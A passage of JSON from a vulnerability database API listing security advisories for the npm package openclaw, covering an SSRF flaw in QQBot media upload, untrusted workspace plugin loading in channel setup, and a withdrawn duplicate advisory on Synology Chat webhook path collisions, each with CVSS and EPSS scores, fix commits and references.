{ "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35619", "GHSA-68f8-9mhj-h2mp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nfva-pukn-uqch" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89344?format=api", "vulnerability_id": "VCID-nkh4-j2pe-1qhr", "summary": "OpenClaw: QQBot direct media upload skipped URL SSRF validation\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow.\n\nThe affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low.\n\n## Fix\n\nOpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls.\n\nFix commit:\n\n- `49db424c8001f2f419aad85f434894d8d85c1a09`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44117", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12782", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12786", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14064", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44117" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44117", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44117" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload" }, { "reference_url": "https://github.com/advisories/GHSA-c4qg-j8jg-42q5", "reference_id": "GHSA-c4qg-j8jg-42q5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c4qg-j8jg-42q5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-44117", "GHSA-c4qg-j8jg-42q5" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nkh4-j2pe-1qhr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89245?format=api", "vulnerability_id": "VCID-ns77-4wfj-9ka6", "summary": "OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows\n## Summary\n\nChannel setup catalog lookups could include untrusted workspace plugin shadows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nChannel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate.\n\n## Technical Details\n\nThe fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows.\n\n## Fix\n\nThe issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `1fede43b948df40ca8674511d4bd08d39f6c5837`\n- PR: private advisory fork\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43571", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.15125", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17378", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17414", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43571" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43571", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43571" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup" }, { "reference_url": "https://github.com/advisories/GHSA-82qx-6vj7-p8m2", "reference_id": "GHSA-82qx-6vj7-p8m2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-82qx-6vj7-p8m2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43571", "GHSA-82qx-6vj7-p8m2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ns77-4wfj-9ka6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89423?format=api", "vulnerability_id": "VCID-nszj-2u6y-xqcb", "summary": "Duplicate Advisory: OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqp8-q22p-5j9q This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat" }, { "reference_url": "https://github.com/advisories/GHSA-g8mc-c5f2-mqg7", "reference_id": "GHSA-g8mc-c5f2-mqg7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g8mc-c5f2-mqg7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": 